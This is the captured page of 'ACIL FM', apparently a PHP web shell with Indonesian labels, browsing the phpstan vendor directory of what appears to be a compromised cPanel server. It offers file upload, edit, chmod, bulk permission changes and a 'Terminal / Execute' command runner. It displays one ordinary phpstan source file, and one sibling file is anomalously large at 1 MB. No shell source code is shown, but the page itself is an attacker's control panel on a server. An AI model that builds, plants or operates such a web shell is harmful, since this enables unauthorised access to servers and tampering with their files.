ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/phpstan/phpdoc-parser/src/Ast/PhpDoc/Doctrine
/
opt
cpanel
ea-wappspector
vendor
phpstan
phpdoc-parser
src
Ast
PhpDoc
Doctrine
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
DoctrineAnnotation.php
663 B
chmod
View
DL
Edit
Rename
Delete
DoctrineArgument.php
836 B
chmod
View
DL
Edit
Rename
Delete
DoctrineArray.php
555 B
chmod
View
DL
Edit
Rename
Delete
DoctrineArrayItem.php
1 MB
chmod
View
DL
Edit
Rename
Delete
DoctrineTagValueNode.php
672 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/phpstan/phpdoc-parser/src/Ast/PhpDoc/Doctrine/DoctrineArray.php
<?php declare(strict_types = 1); namespace PHPStan\PhpDocParser\Ast\PhpDoc\Doctrine; use PHPStan\PhpDocParser\Ast\Node; use PHPStan\PhpDocParser\Ast\NodeAttributes; use function implode; class DoctrineArray implements Node { use NodeAttributes; /** @var list<DoctrineArrayItem> */ public array $items; /** * @param list<DoctrineArrayItem> $items */ public function __construct(array $items) { $this->items = $items; } public function __toString(): string { $items = implode(', ', $this->items); return '{' . $items . '}'; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply